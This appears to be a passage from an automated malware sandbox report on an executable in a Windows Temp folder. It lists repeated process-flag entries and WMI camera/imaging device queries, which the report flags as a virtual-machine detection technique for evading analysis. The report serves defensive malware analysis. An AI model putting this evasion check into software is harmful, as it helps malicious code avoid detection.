Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
